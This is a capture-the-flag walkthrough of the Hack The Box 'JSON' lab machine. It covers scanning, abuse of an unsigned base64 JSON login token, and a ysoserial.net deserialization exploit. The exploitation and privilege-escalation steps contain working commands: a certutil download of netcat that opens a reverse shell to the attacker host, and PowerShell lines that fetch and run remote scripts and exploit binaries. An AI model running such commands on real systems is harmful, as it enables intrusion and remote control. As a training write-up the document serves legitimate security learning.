Hack The Box: JSON Walkthrough

Author: 130n@calvinlai.com

27 Nov 2019

Acknowledgement:

The game could not have been completed without the support of our friends at CTF Playgroup Hong Kong & Macau.

Background:

Objective

Get the user.txt and root.txt

Penetrating Methodology:

Service Scanning

Enumeration

Exploitation

Getting Low Privilege Shell

Walkthrough:

Target machine: 10.10.10.158

Attacking (Hacker) machine: 10.10.14.18

Hacking Process Part 0 – Service Scanning

The target machine IP is 10.10.10.158. Get a basic understanding of the services the target exposes by running an nmap aggressive scan against all available ports.

0.1) Quick Pre-searching

nmap -p- 10.10.10.158

0.2) Detailed Analysis

nmap -sV -p 21,80,135,139,445,5985,47001,49152,49153,49154,49155,49156,49157,49158 -A -oN nmap-htb-json-details.txt 10.10.10.158

PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          FileZilla ftpd
| ftp-syst:
|_  SYST: UNIX emulated by FileZilla
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Json HTB
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC

Enumeration strategies

  1. Check website vulnerabilities
  2. Check for hidden files/folders on the website
  3. Check the FTP port
  4. Check the website

Hacking Process Part 1 – Enumeration

1.1) Strategy 1 Check Vulnerabilities

Nikto -- no vulnerability was found that could be abused to bypass authentication.


1.2) Strategy 2 Check Hidden Folders

Using dirb


Using gobuster

No hidden files/folders were found that could be used for exploitation.

1.3) Strategy 3 FTP

Anonymous login is not allowed.


1.4) Strategy 4 Web Page

Visit the web page.

The site uses a base64-encoded JSON token for authorisation.

Index.html

After several tries it was found that the login credentials are admin/admin.

eyJJZCI6MSwiVXNlck5hbWUiOiJhZG…Sb2wiOiJBZG1pbmlzdHJhdG9yIn0=

{
  "Id": 1,
  "UserName": "admin",
  "Password": "21232f297a57a5a743894a0e4a801fc3",
  "Name": "User Admin HTB",
  "Rol": "Administrator"
}
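To show why this token is weak, here is an added audit script (not part of the original write-up) that decodes a cookie of the shape above and reports what a reviewer would flag: no signature, a password hash handed to the client, and an unsalted MD5. The token is a constructed sample rebuilt from the decoded JSON, since the page's token is truncated.

```python
import base64
import hashlib
import json

# Constructed sample token with the same fields as the cookie decoded above.
SAMPLE_TOKEN = base64.b64encode(json.dumps({
    "Id": 1,
    "UserName": "admin",
    "Password": "21232f297a57a5a743894a0e4a801fc3",
    "Name": "User Admin HTB",
    "Rol": "Administrator",
}).encode()).decode()


def parse_token(token: str) -> dict:
    """Decode the base64 cookie into its JSON object.

    The token carries no signature or MAC, so decoding is all that is
    needed to read every claim the server later trusts.
    """
    return json.loads(base64.b64decode(token))


def is_unsalted_md5_of(digest: str, candidate: str) -> bool:
    """True if digest is the plain MD5 of candidate (no salt, no iteration)."""
    return hashlib.md5(candidate.encode()).hexdigest() == digest.lower()


def audit_token(token: str) -> list:
    """Return the weaknesses visible from the token alone."""
    claims = parse_token(token)
    findings = ["no signature: client-controlled claims are trusted as-is"]
    if "Password" in claims:
        findings.append("password hash is sent to the client")
        # Weak-credential heuristic: hash equals MD5 of the username.
        if is_unsalted_md5_of(claims["Password"], claims.get("UserName", "")):
            findings.append("hash is unsalted MD5 of the username")
    if claims.get("Rol") == "Administrator":
        findings.append("role is carried in the token instead of looked up server-side")
    return findings


if __name__ == "__main__":
    for finding in audit_token(SAMPLE_TOKEN):
        print("-", finding)
```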

Hacking Process Part 2 – Exploitation

2.1) OAuth Token Exploitation

Log in to the website and replace the token with the generated payload.

As the box name implies, the attack should be JSON-related. Use ysoserial.net to prepare the payload for the OAuth2 token.


  1. Download the ysoserial tools

Download master-release-29.zip and unzip the file.

  2. Prepare the strings to generate the payload

Switch off Windows Defender.

Check where the file can be written on the target Windows environment.

ysoserial.exe -f Json.Net -g WindowsIdentity -o base64 -c "certutil.exe -urlcache -split -f "http://10.10.15.158:8888/nc.exe" "C:\windows\system32\spool\drivers\color\nc.exe"&"C:\windows\system32\spool\drivers\color\nc.exe" 10.10.15.158 1234 -e cmd.exe"


  3. Prepare the netcat listener and an HTTP server so the target can download the file

Preparing nc.exe for download


Hacking Process Part 3 – Getting Low Privilege Access

3.1) Log in to the website and use the exploit to get low-privilege access

Update the OAuth2 cookie value and refresh.

Get the systeminfo output and save it for further evaluation.

Search for user.txt with the command dir user.txt /s /p

Hacking Process Part 4 - Privilege Escalation

4.1) Sherlock to find vulnerabilities in the system

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.18:8888/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'"

MS16-135 exploit-db

https://www.exploit-db.com/exploits/40823

Download the file to the target

powershell.exe -exec bypass -command "Invoke-WebRequest 'http://10.10.14.18:8888/ASLRSideChannelAttack.exe' -OutFile 'C:\windows\system32\spool\drivers\color\ASLRSideChannelAttack.exe'"

Execute ASLRSideChannelAttack.exe; it did not work.

4.2) Using Windows-Exploit-Suggester to find vulnerabilities in the system

Using Windows-Exploit-Suggester

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

Save the systeminfo output to a file and run the python script to evaluate the system's CVEs.

It was found that the system has several possible CVEs.

MS16-098 was selected at random to exploit; download the exploit executable from exploit-db.

Conclusion...

Reference Links

Ysoserial

https://github.com/pwntester/ysoserial.net

Sherlock

https://github.com/rasta-mouse/Sherlock/blob/master/Sherlock.ps1

Windows-Exploit-Suggester

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

https://medium.com/soulsecteam/optimum-10-10-10-8-hackthebox-29f8d58da88f